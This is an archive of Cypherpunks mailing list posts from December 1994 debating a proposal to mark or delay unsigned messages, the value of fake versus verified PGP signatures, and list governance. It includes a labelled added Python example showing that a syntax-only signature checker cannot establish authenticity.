What seems abundantly clear, no matter what actions are taken, is that it will be actions plural rather than action singular. The decision process to decide what happens is much more significant architecturally than what actually does happen. An embedded action, i.e. a hardcoded policy, would be bad, and since sig failure handling is a relatively unexplored area, one can do it right the first time.

Assuming such a failure recovery decision process, the actions are simple: ignore, flag, discard, bounce, get key, etc. None are particularly difficult; the decider is what is hard.

Now, assuming both decider and actions, you can very simply ignore all sig failure for cypherpunks.

Encouraging cryptographically valid signatures was the first suggestion I'd seen in this entire debate which seemed to promise tangible benefits;

Syntactic checking also encourages valid signatures, just not as strongly.

encouraging cryptographically invalid signatures is the first notion which appears to offer tangible detriment.

It's a problem that won't go away that the existence of bogus signatures merely make the problem imminent and proximate.

Eric

From an234 at vox.xs4all.nl Thu Dec 1 11:31:06 1994
From: an234 at vox.xs4all.nl (N. Cognito)
Date: Thu, 1 Dec 94 11:31:06 PST
Subject: WHAT THE.. (was: Manditory key sig..
Message-ID: <199412011932.AA22632@xs1.xs4all.nl>

-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 1 Dec 1994 09:32:20 -0700 (PDT), Syed Yusuf wrote:

>in all this discussion about how well it would work and ways around it,
>I think I've missed the problem that people are trying to solve.
>
>isn't it ironic that privacy advocates are suggesting manditory
>loss of anonimity (which is what forced signing is).

Such is certainly not the case for everyone. I don't see that I lose any anonymity by signing MY messages.
I regard it for the most part as a necessary evil inherent in maintaining a stable, reputable pseudonymous persona. I sign everything I mail or post so that eventually individuals who've become familiar with this identity will suspect a spoof if they see something to which my nym is attached but not my digital signature.

To be frank, it's something of a chore for me to sign everything. I do it because there's a good reason for me to do so.

N. Cognito

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
N. Cognito               "Don't put no constrictions on da people.
an234 at vox.xs4all.nl    Leave 'em ta hell alone." -- J. Durante
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
public key available via keyserver

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLt4hx6L3ipYu3mvVAQGaYwQAg/cKHs4RKYEQ1tx5YDQrGUeIeXSe2G+t
xJCh1vKzVYB6VjwVH2MrwyfJXtvXvdVbco2X6xx2KJxpwY1r1WRgYSOsbtehMleg
24a1ukcycYe+lgNn62PEEbxw9zGbL4unHaWLkiFkyzPknSlZSNfBBsQpp11UGmnG
FCVg3SidPlE=
=gg74
-----END PGP SIGNATURE-----

From eric at remailer.net Thu Dec 1 11:36:31 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 11:36:31 PST
Subject: The Market for Crypto--A Curmudgeon's View
In-Reply-To:
Message-ID: <199412012035.MAA13598@largo.remailer.net>

From: abostick at netcom.com (Alan Bostick)

Yes, but you are denying the way in which delaying, like bouncing, actively interferes with the timely forwarding of non-signers' messages, while merely marking them is a more passive form of harassment.

A delay for one minute (assuming notice for the delay) is hardly different than notification only. A delay for a month is hardly different than a bounce. Not all delays are the same. They cannot be analyzed as a single category but are better analyzed with respect to the characteristic time scales of the discussion.

You keep insisting that delaying unsigned messages does not interfere with non-signers' abilities to participate in the discussion.
I say you are wrong. It's a positive hindrance.

This statement is true for large delays and false for small ones. The interesting issue to me is where a boundary might lie.

(Are you going to make sure that all the signatures are valid, or will you accept someone sticking a PGP signature into their .sig and using it over and over?)

At first, it would just be a recognizer for syntax, but at both ends. A second effort might actually hash the message but not bother with the signature itself. The second effort would require almost all the processing involved in a real signature and require the same architecture. It would not, however, be subject to the key distribution problem that I don't want to make a prerequisite.

It occurs to me that a format with just a hash might be generally useful against random data corruption, and not just a workaround hack.

Eric

From eric at remailer.net Thu Dec 1 11:40:47 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 11:40:47 PST
Subject: Warm, fuzzy, misleading feelings
In-Reply-To: <199412010805.AAA27330@netcom16.netcom.com>
Message-ID: <199412012039.MAA13614@largo.remailer.net>

From: jamesd at netcom.com (James A. Donald)

-----BEGIN PGP SIGNED MESSAGE-----

A checker that merely checks if a signature looks like a signature merely makes cryptography look stupid, like a power ranger suit.

Well, the message you posted doesn't look like a PGP signature. It has similarities, but wouldn't pass the recognizer.

As I've said before, there is partial benefit to an incomplete recognizer. I do not want to abandon this benefit merely because others are more difficult to obtain.

I don't understand why a recognizer set up at a single location makes all cryptography look stupid.

Eric

From eric at remailer.net Thu Dec 1 11:57:04 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 11:57:04 PST
Subject: Warm, fuzzy, misleading feelings
In-Reply-To: <199412010957.BAA23404@netcom3.netcom.com>
Message-ID: <199412012055.MAA13646@largo.remailer.net>

From: tcmay at netcom.com (Timothy C. May)

More than just making crypto look stupid, [... it] defeats the whole purpose of user-to-user verification.

Solutions that are bottom up are fine so long as they're not required to remain on the bottom. If a service (not the one I'm proposing) were to actually verify sigs, then some people might want to trust it and some might not, depending on their desires and abilities.

I'm interested in systems which actually allow me to _really verify_ sigs if I have to [...]

And so am I. There is less incentive, however, to set up a sig checker when there are few signatures to check. I don't think we need the whole crypto world to come into bloom at once. In fact, I don't think that _could_ happen and that expecting that sort of parallel development is a positive hindrance to deployment.

I wasn't kidding earlier today (apologies that I'm reading the later mail first, as I just got home) when I argued that toad messages ought to be signed. That is, all traffic from toad.

I didn't think you were kidding, nor did I think that the PGP deficiency you pointed out was trivial. There have been major issues about trustability at toad.com and it is inappropriate at the current time to consider trusting signatures it might make. Again, I don't feel that this problem needs to be solved in order to encourage people to use digital signatures.

If sigs are to be compelled [or bounced ...], then such sigs should *actually be checked*, with the resulting checked messages then signed by toad/Eric/Hugh/John/whatever.

There is some merit to this idea, assuming that signatures are to be used as access control.
The current proposal, however, does not include that and hence the argument above is premature. I'd like to examine it later at some point when it is more timely.

In the interim, though, I leave with an open question: "What would such a server signature represent?"

Anything less than this is actually counterproductive, as it fosters a non-Cypherpunkish view of placing trust in others to do what technology allows one to do directly.

Another non-Cypherpunkish view is to prevent the creation of systems which allow you to use an agency relation to let someone else do something for you. For reading cypherpunks mail on a slow machine, or someone else's machine, I'd be glad to use an agent (the legal denotation here) to verify signatures.

What is definitely non-Cypherpunkish is to promote systems that require trust relations that would not be entered into freely, like the first PEM certificate mechanism.

Eric

From eric at remailer.net Thu Dec 1 12:00:00 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 12:00:00 PST
Subject: Effects of Marking/Delaying Nonsigned Posts
In-Reply-To: <199412011128.DAA27458@netcom3.netcom.com>
Message-ID: <199412012058.MAA13655@largo.remailer.net>

From: tcmay at netcom.com (Timothy C. May)

Eric Hughes wrote:

> This afternoon I considered starting the initial delay at one minute
> and incrementing the delay by one minute each time a message gets
> delayed.

The counter would be global to the server, not local to each user. A concrete basis for comment. You'll likely want to comment again, though.

Eric

From eric at remailer.net Thu Dec 1 12:04:55 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 12:04:55 PST
Subject: We are ALL guests (except Eric)
In-Reply-To: <199412011142.DAA28100@netcom3.netcom.com>
Message-ID: <199412012103.NAA13673@largo.remailer.net>

From: tcmay at netcom.com (Timothy C. May)

> I apply Tim's Calvinist Stoicism stance to this situation. Put
> crudely, if people bolt at the first sign of encroachment, fuck 'em.

Indeed. But if my messages are bounced or delayed excessively, I will of course have no reason to remain. My own Calvinist Stoicism.

I would not say that bounces or long delays were a first sign of encroachment. But it does seem that we have not been addressing the same idea.

> To reiterate, I am willing to use my
> position to send a stronger message.

Bluntly, Eric, this is what is so disturbing about your position. You are willing to "use your position" to essentially purge the list

Again, I've not been speaking of this end result, except insofar of a desire to avoid it.

[re: special small keys for low security applications]

I don't buy this, and hence will have my messages delayed or bounced. I want my key to be useful for real uses, not just "Power Ranger" (a la James Donald) uses.

It appears then, that we disagree about the value of a half solution.

Eric

From rishab at dxm.ernet.in Thu Dec 1 12:06:02 1994
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Thu, 1 Dec 94 12:06:02 PST
Subject: Eric go ahead; Cpunks start Cpunking again
Message-ID:

Good grief! At >500 k, this is the longest 10% thread (SNR 1:10) I've seen in ages.

Eric please go ahead and add the X-Bozo: header field, we can do another in-depth study on its effects in 3 months, while Tim, you, and I figure out how to make digisigs convenient for ourselves. (After all, Eric might not own the 'Cypherpunks list' whatever that is, but he does own cypherpunks at toad.com; we could all move elsewhere, except that despite a few crashes I've found this one especially reliable.)

In the meanwhile, could we get back to cryptography?
There are so many interesting things happening out there - good earnest tough-on-crime Congressmen waiting to sign HR 5199 (the Clipper Bill); the DigiCash trial; the great voice-over-data protocols and products introduced by Intel, Rockwell, ZyXEL and others at Comdex which will make Voice-PGP so much easier (ZyXEL 2864 does V.34 28.8kbps, voice, fax/data simultaneously, 230kbps DTE, parallel port to print faxes on printer when computer is off, $350).

Now what _I_ want is some way to integrate PGP with Netscape...

Rishab

ObEconomistPlug: British judges ruled against a Liberal Democrat Party request to re-run elections where the "Literal Democrats" won 10,000 votes. The new Conversatives will target Tory seats next year. How about a good Cypherpunk Senator ... from the Republican party?

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh        "Clean the air! clean the sky! wash the wind!
rishab at dxm.ernet.in     take stone from stone and wash them..."
rishab at arbornet.org
Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335
H 34C Saket, New Delhi 110017, INDIA

From tcmay at netcom.com Thu Dec 1 12:06:03 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 1 Dec 94 12:06:03 PST
Subject: We are ALL guests (except Eric)
In-Reply-To: <199412011917.LAA13408@largo.remailer.net>
Message-ID: <199412012005.MAA29251@netcom4.netcom.com>

Eric Hughes wrote:
>
> From: tcmay at netcom.com (Timothy C. May)
>
> I haven't said I plan to leave the list. I've said that if my posts
> are blocked/bounced/rejected, I would likely choose not to remain.
>
> Let me ask something more proximate.
>
> Tim, if the server puts a header on mail that identifies it as unsigned,
> how will you feel about seeing your mail marked as such? What might
> you do about such a situation?

I won't do anything. I might not even notice it.
I've never felt that this was important, though I also think it's pretty much useless (as it's so obvious who's at least making the appearance of signing).

Delays of hours or more would affect my participation on the list. Bounces of course would. Those have been my concerns.

On the rest of Eric's message, I'm in agreement with his assessment. I'll elide liberally and only comment on a few points:

> Let the world know that there would be no cypherpunks without both Tim
> May and me. Tim and I met at a party at Hugh Daniel's place; we were
...

All of this is as I remember it.

...
> the mailing list, and with this was a symmetry breaking. As many of
> you know, I spent hours and hours and hours doing mailing list
> maintenance (adding and deleting by hand) and dealing with all of the
> problems. I don't spend so much time on that anymore because of
> majordomo, but I still do deal with the bounces and the complaints and
> the exceptional requests.

Agreed. It was a symmetry breaking and Eric is justly remembered as being the driving force behind the mailing list.

My issue is with the views that are along the lines of "It's Eric's list, and if he says we can only write about Croatian youth hostels, well, hey, it's _his_ list!"

"The map is not the territory," as a famous reverse Polish logician said, and "the list is not the group." Nor is the Cause, the Movement, etc. The mailing list is the preferred forum in cyberspace for discussing things amongst ourselves.

> Now we must shift subjects. What good is assigning credit if no use
> can be made of it? Many substitutes are available for obtaining a
> good feeling. Social position allows one to influence the world. One
> of the most valuable abilities in the world is the ability to get
> people to listen to you. This is not new, merely highlighted by the
> collapse-generating properties of computer networks. Tim and I and
> many others have spent much time devoted to writing clearly enough
> that we will be listened to preferentially, both for clarity itself
> and for the anticipation of clarity.

Well said.

> "Actions speak louder than words" is true for local politics as well
> as global. Both Tim and I yammer a lot, but I do the list work. The
> asymmetry is not incidental. In discussing potential server actions,
> I do not feel constrained to come to agreement with any single voice,
> including Tim. I have a lot of respect for Tim and with respect to
> cypherpunks generally I try not to put myself above him, but with
> respect to the technical underpinnings of the list I feel no such
> constraint. This difference is a long consequence of actions chosen
> by both parties.

I've never proposed a majority vote, or even an "advisory vote" of some body. I've just said, in various forms, that compulsory signing (or compulsory-anything), with delays or bounces, will have certain negative effects, on me, on others, and perhaps on the list as a whole. I've made no "propertarian" or "labor-mingling" arguments, contrary to the views of some, just these opinions of wisdom.

> Now, Tim, I don't know exactly that you feel slighted in this debate
> with respect to origins and their values, but I suspect that you do.
> If so, I regret that, but ask you to, well, deal with it. Symmetry is
> broken, cypherpunks is no longer new, and we who appeared
> interchangeable to the world two years ago now seem different.

I don't feel slighted, not that that would matter. It just sticks in my craw that some folks here are apparently so eager to adopt a position of blind obedience, of alpha male subservience. I'd feel just about as strange (I hope) if people were saying "Look, Tim's the boss. He's the Big Kahuna. If you don't like his policies on his list, leave."

Clearer?

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com    | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay

From eric at remailer.net Thu Dec 1 12:08:20 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 12:08:20 PST
Subject: WHAT THE.. (was: Manditory key sig..
In-Reply-To:
Message-ID: <199412012107.NAA13695@largo.remailer.net>

From: Syed Yusuf

in all this discussion about how well it would work and ways around it, I think I've missed the problem that people are trying to solve.

I want more people to actually use cryptography. I don't phrase it as a problem, with its implicit value judgement, but rather as what I want.

isn't it ironic that privacy advocates are suggesting mandatory loss of anonymity (which is what forced signing is).

The first appearance of a key is anonymous. The second and later are pseudonymous. Even mandatory signing (which is not what is being proposed) does not eliminate anonymity.

Eric

From dcwill at python.ee.unr.edu Thu Dec 1 12:13:18 1994
From: dcwill at python.ee.unr.edu (Dr. D.C. Williams)
Date: Thu, 1 Dec 94 12:13:18 PST
Subject: Warm, fuzzy, misleading feelings
In-Reply-To: <199412011950.LAA13468@largo.remailer.net>
Message-ID: <199412012011.MAA09700@python>

------------BEGIN DIGITALLY SIGNED MESSAGE------------------

From Eric Hughes:
>
> To someone who doesn't know what a digital signature is at all, it
> doesn't matter if it's real or faked. Communication to these people
> is entirely from the odd-looking form of the appendages.

I would prefer to teach fewer of them to speak than teach a larger number of them to grunt.
> I advocate partial progress, and the lack
> of a benefit is not sufficient argument against things that actually
> work.

I believe that your definition of what works and what doesn't may be very
different from mine. Spoofing sigs doesn't qualify as something that
"works" in my book. Maybe banks should start paying high quality forged
checks because some effort has been expended in their creation.

> If you don't have a public key, it doesn't matter if the signature was
> real or faked; you still can't verify it.

No, but if the message is sufficiently important to you, some genuine
productive effort can be expended to acquire the public key and verify
the message. I only bother to verify sigs on messages where authenticity
matters, and I suspect that most others follow the same guideline. A
bogus signature is, of course, unverifiable. Why waste effort requiring
something as non-functional as a spoofed signature?

> One of the purposes of this proposal is to encourage people to change
> their software to automatically sign.

Why? Even AOlers can make a bogus sig as a .sig file and attach it to
every outgoing message. Does this even come close to teaching people how
to use _real_ dig sigs? I don't think so. What's the benefit of teaching
and encouraging people to do the wrong thing?

> The benefit I want more, of the two, is
> the automaticity. If, for whatever reason, actual signing can't
> happen, I am content with the form of a signature.

Then the vast majority of grunters will put a spoof in their .sig files
and be "done" with crypto. If you see that as serving some higher purpose,
then you and I will never agree on this issue.

> That's fine, and I agree with the idea as a solution to the insecurity
> of keys on a public machine. I do not, however, feel I need to insist
> that everyone do this.

Rather than insist that people be forced down any specific path, they
should be encouraged to use proper forms of digital authentication.
I thought that was your original goal, and I'm disappointed that your
original objective has been compromised by an
"automatic-spoof-is-good-enough" clause.

> 1. Crypto-unaware people will see the form and ask what it is.

"Aww, that some kind of gibberish I had to include so my post would go
through without being delayed. It really doesn't mean or do anything.
Last week, I didn't know nothin' about crypto . . ."

> 2. Crypto-aware people will alter their software to do something
> automatically.

In vi, type

:r .sig

and suddenly, the following pops up:

Beavis at butthead.biteme.edu
--------BEGIN BFD SIGNATURE-------
GyGYTv%c4u68998*7tvv5c4%$ex3xc$%ec^%^&tb*&b98&YN8(MN})]mn*&b87Tyv5r8
BN8&b987y*&%Rc5$X4523W5-9}]{)([]0NP89YB67&C$Ec4ex$#xw%^v90-*U-m9_0987V
---------END BFD SIGNATURE--------

Automagically! And much easier than actually bothering to learn something
really useful.

> 2a. Many, perhaps most, of these people will use real crypto once
> auto-something already set up.

Not if they don't need to really get or use it.

If your proposal required something more than a shoddy spoof, it _would_
have a lot of merit. But anyone can append a dig sig without even knowing
how to spell PGP. That's where your good idea is derailed. I fail to see
any good that can flow from compelling people to do something stupid. If
you're committed to the Real Thing, herd the cats into the place they
really belong instead of letting them decide where to go and later
claiming that that was where you wanted them to go all along.

=D.C. Williams

-------------HERE'S MY DIGITAL SIGNATURE:-----------------------
[ASCII-art signature]
--------------PRETTY COOL, HUH?
-------------------------------

From rfb at lehman.com Thu Dec 1 12:38:46 1994
From: rfb at lehman.com (Rick Busdiecker)
Date: Thu, 1 Dec 94 12:38:46 PST
Subject: signing messages
In-Reply-To: <199411300623.WAA03988@netcom11.netcom.com>
Message-ID: <9412012036.AA15164@cfdevx1.lehman.com>

    From: "Timothy C. May"
    Date: Tue, 29 Nov 1994 22:23:09 -0800 (PST)

    1. Only one person has reported to me that they were unable to
    verify my PGP sig (Lance Cottrell reported this...if others did,
    maybe their messages haven't gotten through to me). From this I
    conclude that few people check PGP sigs.

A safer conclusion would be that few people report signature failures,
although I suspect that your conclusion is also correct.

I noticed that your message's signature failed, but chose not to
report it. As I recall, it failed because I didn't have the
appropriate key, although I do have your 0x54E7483F key and the key
that it appeared to be signed with wasn't available from the MIT key
server.

I also noticed Bill Stewart's signature failure on Message-Id:
<9411300425.AA21554 at anchor.ho.att.com> -- ASCII armor stripping
failed.

In both cases, I assumed that the sender was trying to spoof the act
of signing and I further assumed that you were more careful to match
the form of a signed message than Bill was. The fact that you've been
doing some spoofing lately only strengthened my sense that this was
another gag.

Often, but not always, when I see a Bad Signature message I let the
sender know about it.

Rick

From paul at poboy.b17c.ingr.com Thu Dec 1 12:44:42 1994
From: paul at poboy.b17c.ingr.com (Paul Robichaux)
Date: Thu, 1 Dec 94 12:44:42 PST
Subject: We are ALL guests (except Eric)
In-Reply-To: <199412012005.MAA29251@netcom4.netcom.com>
Message-ID: <199412012040.AA05059@poboy.b17c.ingr.com>

-----BEGIN PGP SIGNED MESSAGE-----

Tim said:
> It just sticks in my craw that some folks here are apparently so eager
> to adopt a position of blind obedience, of alpha male subservience.
> I'd feel just about as strange (I hope) if people were saying "Look,
> Tim's the boss. He's the Big Kahuna. If you don't like his policies on
> his list, leave."

No, not the Big Kahuna-- the Big Mac.

(ducking),
- -Paul

- --
Paul Robichaux, KD4JZG       | Good software engineering doesn't reduce the
perobich at ingr.com          | amount of work you put into a product; it just
Not speaking for Intergraph. | redistributes it differently.
### http://www.intergraph.com ###

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCUAwUBLt40rqfb4pLe9tolAQHgbAP4r4tfCArfLisSSY2BUGbzYOVyesiKM3ML
7xXt6eIirk2OnCjdbFs+ZOJxszvWW7eLxqk0lbDWprJQfeSKBgJc4uz3Yfow8sbs
pxrO3adKOj1cgZnotr/8whA0BXK1QhycyEnjV+t+rEZ7qdUTuFvdpSaZ7Oy224uI
NwrU6sVMBQ==
=ni+J
-----END PGP SIGNATURE-----

From eric at remailer.net Thu Dec 1 12:45:22 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 12:45:22 PST
Subject: We are ALL guests (except Eric)
In-Reply-To: <199412012005.MAA29251@netcom4.netcom.com>
Message-ID: <199412012144.NAA13805@largo.remailer.net>

   From: tcmay at netcom.com (Timothy C. May)

[re: reaction to marking]

   I won't do anything. I might not even notice it. I've never felt that
   this was important, though I also think it's pretty much useless (as
   it's so obvious who's at least making the appearance of signing).

I'm thinking of using something real obvious as a marker, similar in
spirit to what I posted the other day:

   X-Advocacy: Eric Hughes wants YOU to sign your message.

I may actually use something very close to this, perhaps with the name
instead of the personal pronoun. This header would be attached only
to messages without a recognized signature.

[re: reaction to delay]

   Delays of hours or more would affect my participation on the list.
   Bounces of course would. Those have been my concerns.

I have realized all along that bouncing messages would be extremely
disruptive; I apologize to the list if I made that less than clear.
As far as specific times, I think the cutover happens somewhere
between two and four hours. If delays get used, you can be sure
they'll start small and rise slowly.

   My issue is with the views that are along the lines of "It's Eric's
   list, and if he says we can only write about Croatian youth hostels,
   well, hey, it's _his_ list!"

I am also far less than persuaded by such arguments.

   I don't feel slighted, not that that would matter.

Well, it would matter to me. But then again, I'd first try to
acknowledge any such feelings, and then I'd tell you to fuck off if you
couldn't deal with reality. But Hey! that's just me, I suppose.

   I'd feel just about as strange (I hope) if people were saying "Look,
   Tim's the boss. He's the Big Kahuna. If you don't like his policies on
   his list, leave."

"This is one _tasty_ burger"

   Clearer?

Yes, clearer.

Fortunately for me, I was locally famous in high school in (drum roll)
competitive classics. I experienced some of exactly the kind of
subservience accorded to famous people. I developed a distaste for it
then, which has not left.

I have some understanding of the loneliness of celebrity. When a
sycophant doesn't treat you like a peer, there's little point in
trying to even out the relationship. It's almost always doomed.

Here are Eric's two sentence advice on celebrity. If you want to know
famous people, don't treat them differently than others. If they
therefore ignore you, leave.

Eric

From geoffrey at crl.com Thu Dec 1 12:48:08 1994
From: geoffrey at crl.com (Geoffrey Faivre-Malloy)
Date: Thu, 1 Dec 94 12:48:08 PST
Subject: Eric go ahead; Cpunks start Cpunking again
In-Reply-To:
Message-ID:

On Fri, 2 Dec 1994 rishab at dxm.ernet.in wrote:

>
> In the meanwhile, could we get back to cryptography? There are so many
> interesting things happening out there - good earnest tough-on-crime
> Congressmen waiting to sign HR 5199 (the Clipper Bill); the DigiCash trial;

DigiCash trial? Tell me more!
> the great voice-over-data protocols and products introduced by Intel, Rockwell,
> ZyXEL and others at Comdex which will make Voice-PGP so much easier (ZyXEL
> 2864 does V.34 28.8kbps, voice, fax/data simultaneously, 230kbps DTE, parallel
> port to print faxes on printer when computer is off, $350).

Now THAT sounds cool! :) Wonder how long it will be before someone uses
PGP in a phone :) How much processing power would it take to do that on
the fly anyway?

>
> Now what _I_ want is some way to integrate PGP with Netscape...

What's Netscape?

--------------------------------------------------------------------------
| Geoffrey at crl.com          The opinions expressed herein may or       |
| Geoffrey Faivre-Malloy      may not be the opinions of my employer.    |
| Purple Duck Software        Like anyone really cares...                |
--------------------------------------------------------------------------
| Snail Mail: 613 Calibre Springs Way, Atlanta GA, 30342                 |
--------------------------------------------------------------------------

From eric at remailer.net Thu Dec 1 12:52:08 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 12:52:08 PST
Subject: recent voice over data
In-Reply-To:
Message-ID: <199412012150.NAA13820@largo.remailer.net>

   the great voice-over-data protocols and products introduced by
   Intel, Rockwell, ZyXEL and others at Comdex which will make
   Voice-PGP so much easier

As I understand these voice-over-data products, the voice goes over
analog, added to the modem signal. The modem signal is interpreted,
and then reconstructed and subtracted from the incoming signal,
leaving voice.

Very clever, but insufficient for secure phones.

Eric

From lmccarth at ducie.cs.umass.edu Thu Dec 1 12:55:37 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Thu, 1 Dec 94 12:55:37 PST
Subject: Is it happening already ?
Message-ID: <199412012056.PAA23759@ducie.cs.umass.edu>

-----BEGIN PGP SIGNED MESSAGE-----

I hope this is not the start of a trend toward meaningless signatures
along the lines I mentioned recently.

Hal Finney, who commands more respect from me than does anyone else on
the list to date, has just started to PGP sign his messages to the list.
However, so far they haven't been signed with a key I've been able to
locate. AFAIK, he hasn't sent it to the list. Portal does not accept
external fingers. I requested "GET Finney" from one of the key servers
at MIT, but all I received was the remailer key I had before.

Does someone else have Hal's key ? I could send him mail directly, but
I'd prefer to get the key from someone else if it's out there (to learn
from my mistake), or else raise this issue again if it's deliberately
unavailable.

- -L. Futplex McCarthy; PGP key by finger or server
"Don't say my head was empty, when I had things to hide...." --Men at Work

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLt44O2f7YYibNzjpAQFBQwQAuN3BTSjJnZVnWgsu7WUvsw2ZnE336qqy
dFJAkfV7Mdfds3+e3uyR4xHR73TG08lq5Scsohq5D7tOshndzyuVmvKKfRIgSifo
hOVkIFuSNjM5Gphnbdcao8NccQMAkZ1CMWysqsI9kAQUBHEXHiUgjAtnsHw8pbL9
JW4GJoo3ADk=
=8W2C
-----END PGP SIGNATURE-----

From cfrye at mason1.gmu.edu Thu Dec 1 12:58:18 1994
From: cfrye at mason1.gmu.edu (Curtis D Frye)
Date: Thu, 1 Dec 94 12:58:18 PST
Subject: Closed Account
Message-ID: <9412012058.AA24321@mason1.gmu.edu>

ACCOUNT cfrye at mason1.gmu.edu IS NO LONGER AVAILABLE.
IF THIS IS A LIST, THEN PLEASE REMOVE THIS ADDRESS.
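
Added example, not part of any message in this archive and not code from the list software: the difference argued over above, between checking that a signature looks like one and verifying it, shown as a syntax-only checker for PGP clearsigned framing. The function names, the sample text and the sample packet (including its key ID 0123456789ABCDEF) are constructed for illustration, and only the version 2/3 signature packets of the PGP 2.x era are parsed.

```python
import base64

BEGIN_MSG = "-----BEGIN PGP SIGNED MESSAGE-----"
BEGIN_SIG = "-----BEGIN PGP SIGNATURE-----"
END_SIG = "-----END PGP SIGNATURE-----"

def crc24(data: bytes) -> int:
    """CRC-24 checksum used by OpenPGP ASCII armor."""
    crc = 0xB704CE
    for byte in data:
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= 0x1864CFB
    return crc & 0xFFFFFF

def v3_key_id(packet: bytes):
    """Key ID claimed by an old-format version 2/3 signature packet, else None.
    Until the signature is verified, this value is only a claim."""
    # Header octet 10ttttll: tag 2 is a signature; ll selects 1, 2 or 4 length octets.
    if len(packet) < 2 or packet[0] & 0xC0 != 0x80 or (packet[0] >> 2) & 0x0F != 2:
        return None
    length_octets = {0: 1, 1: 2, 2: 4}.get(packet[0] & 0x03)
    if length_octets is None:
        return None
    body = packet[1 + length_octets:]
    # version, hashed length (always 5), signature type, 4-octet time, 8-octet key ID
    if len(body) < 15 or body[0] not in (2, 3) or body[1] != 5:
        return None
    return body[7:15].hex().upper()

def verdict(level, reason, key_id=None):
    return {"level": level, "reason": reason, "key_id": key_id}

def find(lines, marker, start=0):
    return lines.index(marker, start) if marker in lines[start:] else -1

def check_form(text: str) -> dict:
    """Syntax-only check of a clearsigned message. It never touches a public key,
    so "well-formed" means the framing parses, not that anyone signed anything."""
    lines = text.splitlines()
    top = find(lines, BEGIN_MSG)
    sig = find(lines, BEGIN_SIG, max(top, 0))
    end = find(lines, END_SIG, max(sig, 0))
    if top < 0 and sig < 0:
        return verdict("none", "no OpenPGP framing lines")
    if top < 0:
        return verdict("malformed", "signature block without the header line on top")
    if sig < 0 or end < 0:
        return verdict("malformed", "header line without a complete signature block")
    head = lines[top + 1:sig]            # optional "Key: value" lines, then a blank line
    if "" not in head or not all(": " in h for h in head[:head.index("")]):
        return verdict("malformed", "header line not followed by a blank line")
    block = lines[sig + 1:end]           # armor headers, blank line, base64, "=CRC"
    if "" not in block:
        return verdict("malformed", "no blank line after the armor headers")
    data = block[block.index("") + 1:]
    if len(data) < 2 or not data[-1].startswith("="):
        return verdict("malformed", "missing armor checksum line")
    try:
        packet = base64.b64decode("".join(data[:-1]), validate=True)
        stated = int.from_bytes(base64.b64decode(data[-1][1:], validate=True), "big")
    except ValueError:
        return verdict("malformed", "armor is not valid base64")
    if crc24(packet) != stated:
        return verdict("malformed", "armor checksum mismatch")
    key_id = v3_key_id(packet)
    if key_id is None:
        return verdict("malformed", "armor does not hold a v2/v3 signature packet")
    return verdict("well-formed", "syntax only, nothing verified", key_id)

def armor(packet: bytes) -> str:
    """Armor a packet (used only to build the constructed samples below)."""
    check = base64.b64encode(crc24(packet).to_bytes(3, "big")).decode()
    return "\n".join([BEGIN_SIG, "Version: constructed", "",
                      base64.b64encode(packet).decode(), "=" + check, END_SIG])

def sample_packet() -> bytes:
    """Constructed v3 signature packet: correct layout, meaningless signature value."""
    body = bytes([3, 5, 0x01]) + (786312000).to_bytes(4, "big")
    body += bytes.fromhex("0123456789ABCDEF")   # constructed key ID
    body += bytes([1, 1, 0, 0])                 # RSA, MD5, two hash-prefix octets
    body += bytes([0, 16, 0x80, 0x01])          # one 16-bit MPI
    return bytes([0x88, len(body)]) + body

TEXT = "Message text constructed for this example."
SAMPLES = {
    "framed": "\n".join([BEGIN_MSG, "", TEXT, armor(sample_packet())]),
    "bottom_only": "\n".join([TEXT, armor(sample_packet())]),
    "lookalike": "\n".join([TEXT, "--------BEGIN BFD SIGNATURE-------",
                            "xxxxxxxx", "---------END BFD SIGNATURE--------"]),
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, check_form(text))
```

The "well-formed" verdict on the constructed sample, which no key ever signed, is the limitation in question: authenticity is established only by verifying the signature against the signer's public key.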
From paul at poboy.b17c.ingr.com Thu Dec 1 13:01:20 1994
From: paul at poboy.b17c.ingr.com (Paul Robichaux)
Date: Thu, 1 Dec 94 13:01:20 PST
Subject: Brands excluded from digicash beta
In-Reply-To: <199412011627.IAA14481@jobe.shell.portal.com>
Message-ID: <199412012056.AA05724@poboy.b17c.ingr.com>

-----BEGIN PGP SIGNED MESSAGE-----

I'm going to tie together two threads on ecash: one here (Hal and Rishab
have both mentioned the ecash system test recently) and one from
www-buyinfo about scalability. If you dislike ecash, hit 'n' now

I'm running one of the prototype shops (http://www.iquest.com/~fairgate),
so let me chime in with my e$0.02 of comments. (no, that doesn't mean I'll
pay you e$0.02 to read them!)

Hal said:
> I just figured that I didn't have enough clout for them to bother to
